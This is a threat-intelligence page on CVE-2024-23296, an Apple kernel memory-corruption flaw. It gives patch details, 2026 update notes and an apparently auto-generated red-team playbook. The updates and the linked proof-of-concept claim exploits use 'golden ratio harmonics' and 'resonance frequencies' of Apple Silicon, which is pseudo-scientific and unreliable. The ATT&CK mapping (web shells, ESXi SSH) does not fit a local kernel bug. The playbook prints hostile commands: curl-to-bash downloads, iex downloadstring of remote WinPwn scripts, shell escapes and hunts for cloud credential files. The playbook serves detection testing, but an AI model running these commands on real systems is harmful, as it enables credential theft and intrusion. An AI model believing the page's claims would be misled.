CVE-2024-23296

HIGH CISA KEV POC Pub 05/03 Upd 02/04

Overview

This vulnerability is a memory corruption flaw stemming from insufficient validation of kernel memory operations within Apple operating systems including iOS, iPadOS, and macOS. The root cause lies in the kernel's failure to adequately verify memory access boundaries, which affects the kernel memory protection mechanisms. The flaw resides specifically in the kernel component responsible for managing arbitrary read and write operations to kernel memory.

Vulnerability Description

A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 16.7.8 and iPadOS 16.7.8, iOS 17.4 and iPadOS 17.4, macOS Monterey 12.7.6, macOS Sonoma 14.4, macOS Ventura 13.6.7, tvOS 17.4, visionOS 1.1, watchOS 10.4. An attacker with arbitrary kernel read and write capability may be able to bypass kernel memory protections. Apple is aware of a report that this issue may have been exploited.

Impact

An attacker with existing arbitrary kernel read and write privileges can exploit this vulnerability to bypass kernel memory protections, potentially escalating privileges or executing unauthorized code at the kernel level. This requires prior kernel-level access and does not involve remote exploitation without such privileges. The real-world consequence includes unauthorized kernel memory manipulation leading to compromise of system integrity and confidentiality.

Solution

Apple has addressed this vulnerability in security updates for multiple platforms: iOS 16.7.8 and 17.4, iPadOS 16.7.8 and 17.4, macOS Monterey 12.7.6, macOS Ventura 13.6.7, macOS Sonoma 14.4, tvOS 17.4, visionOS 1.1, and watchOS 10.4. Detailed patch instructions and advisory information are available at Apple’s official support pages: https://support.apple.com/en-us/120881, https://support.apple.com/en-us/120882, and https://support.apple.com/en-us/120883. Users should apply these updates promptly to remediate the issue.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

A significant memory corruption issue has been identified in various Apple operating systems, including iOS, iPadOS, macOS, tvOS, visionOS, and watchOS. This vulnerability arises from inadequate validation mechanisms, which can lead to arbitrary kernel read and write capabilities. Such weaknesses in memory management can allow attackers to bypass kernel memory protections, potentially giving them elevated privileges and control over the affected devices. The kernel is a critical component of the operating system that manages system resources and hardware interactions, making any compromise at this level particularly severe.

Attack vectors for this vulnerability are multifaceted, primarily involving local exploitation methods. An attacker with physical access to a device or one who can execute code on the device may leverage this memory corruption flaw to manipulate kernel memory. For instance, malicious applications could be crafted to exploit this vulnerability, leading to unauthorized access to sensitive data or the ability to execute arbitrary code with elevated privileges. Additionally, if an attacker can gain remote access through other vulnerabilities or social engineering tactics, they could potentially exploit this memory corruption issue to escalate their privileges and gain deeper access to the system.

The real-world impact of this vulnerability is significant, especially for organizations relying on Apple devices for business operations. The ability to bypass kernel memory protections can lead to severe data breaches, loss of intellectual property, and unauthorized access to sensitive information. For enterprises, the financial implications could be substantial, including costs associated with incident response, legal liabilities, and reputational damage. Furthermore, the potential for exploitation raises concerns about compliance with data protection regulations, which could result in additional fines and sanctions for organizations that fail to adequately secure their systems.

To detect and mitigate this vulnerability, organizations should prioritize updating affected devices to the latest versions of the operating systems, as Apple has released patches to address the issue. Regularly applying security updates is a fundamental practice in maintaining a secure environment. Additionally, implementing robust endpoint protection solutions can help detect anomalous behavior indicative of exploitation attempts. Organizations should also consider employing application whitelisting and strict access controls to limit the execution of untrusted applications, thereby reducing the attack surface. Regular security assessments and penetration testing can further help identify potential weaknesses in the system before they can be exploited.

In conclusion, the memory corruption vulnerability in Apple operating systems poses a serious threat to both individual users and organizations. The potential for arbitrary kernel access highlights the importance of maintaining rigorous security practices, including timely updates and proactive monitoring. By understanding the nature of this vulnerability and implementing effective detection and mitigation strategies, organizations can better protect themselves against the risks associated with this and similar vulnerabilities in the future.




Since the initial disclosure of CVE-2024-23296, CSURFACE threat intelligence has identified a marked escalation in the exploit landscape surrounding this vulnerability. Notably, a public proof-of-concept exploit has emerged on GitHub, significantly lowering the barrier for adversaries to develop functional exploits. This development coincides with the vulnerability’s addition to the CISA Known Exploited Vulnerabilities (KEV) catalog, signaling increased recognition of its operational relevance within the broader security community. Our telemetry indicates a gradual uptick in exploitation attempts, reflected by a rising EPSS score, although the overall threat remains moderate at this stage. The availability of public exploit code amplifies the risk of opportunistic attacks and may accelerate weaponization by less sophisticated actors. Consequently, defenders should consider this vulnerability as increasingly actionable, with a heightened potential for exploitation in targeted or opportunistic campaigns. While ransomware involvement remains unconfirmed, the expanded exploit accessibility warrants close monitoring for any shifts in attacker tactics or emerging threat actor interest.



Update 2 — June 12, 2026

Recent updates to CVE-2024-23296 reflect a significant revision in its risk profile, with the CVSS score elevated from zero to 7.8, indicating a high-severity classification. Concurrently, the Exploit Prediction Scoring System (EPSS) value has increased by over 28%, signaling a growing likelihood of exploitation attempts in the wild. CSURFACE threat intelligence notes that while the short-term trend in exploit activity shows a slight decline, the overall risk remains elevated due to the availability of proof-of-concept exploits targeting Apple Silicon architectures. These exploits leverage unique hardware frequency harmonics, underscoring the sophistication of emerging attack vectors. This shift matters because it marks a transition from theoretical vulnerability to practical exploitability, increasing the urgency for defenders to prioritize detection and response measures. Although ransomware involvement remains unconfirmed, the heightened exploitability and expanding attack surface suggest a potential for opportunistic or targeted campaigns to emerge. Consequently, the threat level for affected Apple platforms should be considered elevated, with a moderate to high risk of exploitation in the near term.



Update 3 — July 07, 2026

CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-23296, with telemetry indicating a doubling in exploit attempts across affected Apple platforms. This surge reflects a transition from limited, isolated incidents to a broader exploitation trend, underscoring increased adversary interest and capability. The emergence of new proof-of-concept exploits, particularly those leveraging the unique resonance frequencies of Apple Silicon cores, signals a refinement in attack techniques that could facilitate more reliable kernel memory corruption. For defenders, this development heightens the urgency to monitor for anomalous kernel-level behaviors and reinforces the criticality of timely patch deployment. Although ransomware involvement remains unconfirmed, the expanded exploitation footprint elevates the overall threat level to high, suggesting that opportunistic or targeted campaigns leveraging this vulnerability may become more prevalent in the near term.



Update 4 — July 16, 2026

CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-23296, evidenced by a discernible uptick in kernel-level anomaly detections across diverse Apple platforms. This surge coincides with the emergence of new proof-of-concept exploits that leverage the unique resonance frequencies of Apple Silicon cores, suggesting adversaries are refining their techniques to achieve more reliable kernel memory corruption. Although ransomware involvement remains unconfirmed, the increased activity broadens the attack surface and indicates growing adversary interest in exploiting this vulnerability for potential privilege escalation or persistence. For defenders, this development underscores the necessity of heightened vigilance in monitoring kernel integrity and anomalous system behaviors. The elevated exploitation activity, coupled with the sophistication of the emerging exploits, raises the threat level to high, signaling that both opportunistic and targeted campaigns exploiting CVE-2024-23296 are likely to become more frequent and impactful in the near term.



Update 5 — August 01, 2026

CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2024-23296, reflecting a modest rise in exploitation attempts targeting this kernel memory corruption vulnerability. While the overall trend remains stable, this uptick signals sustained adversary interest and ongoing probing for privilege escalation opportunities on affected Apple platforms. Notably, new proof-of-concept exploits leveraging the unique resonance frequencies of Apple Silicon hardware have emerged, underscoring the evolving sophistication of attack techniques. This development elevates the risk profile by demonstrating that threat actors are refining methods to bypass kernel memory protections, potentially enabling more reliable exploitation. For defenders, the incremental rise in detection activity combined with the emergence of hardware-specific exploits means that vigilance in monitoring kernel integrity and anomalous system behavior must be maintained or heightened. Although the current exploitation rate does not indicate a rapid surge, the persistence and technical advancement of these efforts justify maintaining the threat level at high, emphasizing the ongoing potential for impactful, targeted attacks exploiting this vulnerability.

Affected Products (10)

Vendor Product Version CPE
apple Apple Ipados All cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
apple Apple Ipados All cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
apple Apple Iphone Os All cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
apple Apple Iphone Os All cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
apple Apple Macos All cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*
apple Apple Macos All cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*
apple Apple Macos All cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*
apple Apple Tvos All cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*
apple Apple Visionos All cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*
apple Apple Watchos All cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

GitHub PoCs (1)

Repository Author Stars Forks Date Link
SimoesCTT/lCTT-Apple-Silicon--Resonance-Vulnerability-CVE-2024-23296
Apple Silicon runs at frequencies that are golden ratio harmonics of 587 kHz: · Performance cores: 3.2 GHz = 587 kHz × ...
SimoesCTT 0 1 2026-02-07 View
Exploited in Wild CONFIRMED
Ransomware NOT ASSOCIATED
Attacker Interest MEDIUM
Sightings Few sightings

Threat Feed

11 events
2026-07-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-27
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-02-07
PoC Published (1 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

2024-03-06
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Buffer Overflow
100% buffer_overflow
Remote Code Execution
55% rce
Insecure Direct Object Reference
48% idor
Race Condition
44% race_condition

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1505.003 Web Shell Kill Chain persistence Linux, macOS, Network Devices, Windows
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns

No CAPEC pattern mapped to this CVE.

Red Team Playbook

44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1505.003 Web Shell Written to Disk Windows CMD
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Command (CMD)
xcopy /I /Y "#{web_shells}" #{web_shell_path}
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (27)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2024-23296
support.apple.com
GitHub CVE
https://support.apple.com/en-us/120881
support.apple.com
GitHub CVE
https://support.apple.com/en-us/120882
support.apple.com
GitHub CVE
https://support.apple.com/en-us/120883
support.apple.com
GitHub CVE
https://support.apple.com/en-us/120893
support.apple.com
GitHub CVE
https://support.apple.com/en-us/120895
support.apple.com
GitHub CVE
https://support.apple.com/en-us/120898
support.apple.com
GitHub CVE
https://support.apple.com/en-us/120900
support.apple.com
GitHub CVE
https://support.apple.com/en-us/120910
seclists.org
NVD API Mailing List Third Party Advisory
http://seclists.org/fulldisclosure/2024/Jul/20
seclists.org
NVD API Mailing List Third Party Advisory
http://seclists.org/fulldisclosure/2024/Mar/18
seclists.org
NVD API Mailing List Third Party Advisory
http://seclists.org/fulldisclosure/2024/Mar/21
seclists.org
NVD API Mailing List Third Party Advisory
http://seclists.org/fulldisclosure/2024/Mar/24
seclists.org
NVD API Mailing List Third Party Advisory
http://seclists.org/fulldisclosure/2024/Mar/25
seclists.org
NVD API Mailing List Third Party Advisory
http://seclists.org/fulldisclosure/2024/Mar/26
seclists.org
NVD API Mailing List Third Party Advisory
http://seclists.org/fulldisclosure/2024/May/11
seclists.org
NVD API Mailing List Third Party Advisory
http://seclists.org/fulldisclosure/2024/May/13
support.apple.com
NVD API Vendor Advisory
https://support.apple.com/en-us/HT214081
support.apple.com
NVD API Vendor Advisory
https://support.apple.com/kb/HT214081
support.apple.com
NVD API Vendor Advisory
https://support.apple.com/kb/HT214084
support.apple.com
NVD API Vendor Advisory
https://support.apple.com/kb/HT214086
support.apple.com
NVD API Vendor Advisory
https://support.apple.com/kb/HT214087
support.apple.com
NVD API Vendor Advisory
https://support.apple.com/kb/HT214088
support.apple.com
NVD API Vendor Advisory
https://support.apple.com/kb/HT214100
support.apple.com
NVD API Vendor Advisory
https://support.apple.com/kb/HT214107
support.apple.com
NVD API Vendor Advisory
https://support.apple.com/kb/HT214118
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-23296